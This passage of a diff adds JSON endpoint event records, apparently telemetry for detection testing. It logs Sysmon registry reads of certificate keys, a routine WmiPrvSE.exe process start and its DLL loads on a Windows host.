"Disallowed", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + 
"registry_value": "HKCR", + "timestamp": 131883573488550000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573488550000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573488550000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573488550000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573488550000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "command_line": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe -secured -Embedding", + "event_type": "process", + "logon_id": 997, + "parent_process_name": "svchost.exe", + "parent_process_path": "C:\\Windows\\System32\\svchost.exe", + "pid": 4036, + "ppid": 780, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "subtype": "create", + "timestamp": 131883573488670000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}", + "unique_ppid": "{42FC7E13-B293-5C05-0000-0010FAC80000}", + "user": "NT AUTHORITY\\LOCAL SERVICE", + "user_domain": "NT AUTHORITY", + "user_name": "LOCAL 
SERVICE" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573488700016, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573488700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573488700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573488700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4036, + "process_name": 
"WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573488700016, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 
131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573488860000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "WmiPrvSE.exe", + "image_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573488700016, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "fastprox.dll", + "image_path": "C:\\Windows\\System32\\wbem\\fastprox.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": 
"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "wbemcomn.dll", + "image_path": "C:\\Windows\\System32\\wbemcomn.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\System32\\bcrypt.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573489020000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 4036, + "process_name": "wmiprvse.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", + "registry_key": "HKLM", + "registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 4036, + "process_name": "wmiprvse.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 4036, + "process_name": "wmiprvse.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Wbem", + "registry_value": "Wbem", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 4036, + "process_name": "wmiprvse.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", + "registry_key": "HKLM", + "registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 4036, + "process_name": "wmiprvse.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 4036, + "process_name": "wmiprvse.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft", + 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\Wbem", + "registry_value": "Wbem", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
